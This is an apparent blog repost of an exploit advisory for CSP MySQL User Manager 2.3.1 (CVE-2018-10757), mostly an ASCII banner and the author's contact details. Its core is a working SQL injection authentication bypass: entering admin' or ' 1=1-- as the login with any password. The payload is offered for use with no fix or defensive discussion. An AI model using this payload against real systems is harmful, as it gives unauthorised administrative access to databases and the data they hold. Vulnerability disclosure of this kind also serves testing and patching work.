Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86387620

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: CSP MySQL User Manager 2.3.1 - Authentication Bypass
# Date: 2018-05-04
# Exploit Author: Youssef mami
# Vendor Homepage: https://code.google.com/archive/p/cspmum/
# Software Link: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
# Version: 2.3.1
# Tested on: Linux 2.6.38-11
# CVE : CVE-2018-10757

##################################################################################
.__                                                  __   
|  |__ _____    _____   _____ _____    _____   _____/  |_ 
|  |  \\__  \  /     \ /     \\__  \  /     \_/ __ \   __\
|   Y  \/ __ \|  Y Y  \  Y Y  \/ __ \|  Y Y  \  ___/|  |  
|___|  (____  /__|_|  /__|_|  (____  /__|_|  /\___  >__|  
     \/     \/      \/      \/     \/      \/     \/      
.__        _____                            __  .__                      
|__| _____/ ____\___________  _____ _____ _/  |_|__| ________ __   ____  
|  |/    \   __\/  _ \_  __ \/     \\__  \\   __\  |/ ____/  |  \_/ __ \ 
|  |   |  \  | (  <_> )  | \/  Y Y  \/ __ \|  | |  < <_|  |  |  /\  ___/ 
|__|___|  /__|  \____/|__|  |__|_|  (____  /__| |__|\__   |____/  \___  >
        \/                        \/     \/            |__|           \/ 
                          .__                     
  ______ ______________  _|__| ____  ____   ______
 /  ___// __ \_  __ \  \/ /  |/ ___\/ __ \ /  ___/
 \___ \\  ___/|  | \/\   /|  \  \__\  ___/ \___ \ 
/____  >\___  >__|    \_/ |__|\___  >___  >____  >
     \/     \/                    \/    \/     \/ 

                                                                                                                                         
##################################################################################                                
SQL Injection Authentication Bypass
Product Page: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
 
Author(Pentester): Youssef mami (contact@hammamet-services.com)
On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( our blog )
On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info
##################################################################################
we just need to input admin login like this : admin' or ' 1=1-- and any password :-) 
login : admin' or ' 1=1--
password: hammamet informatique services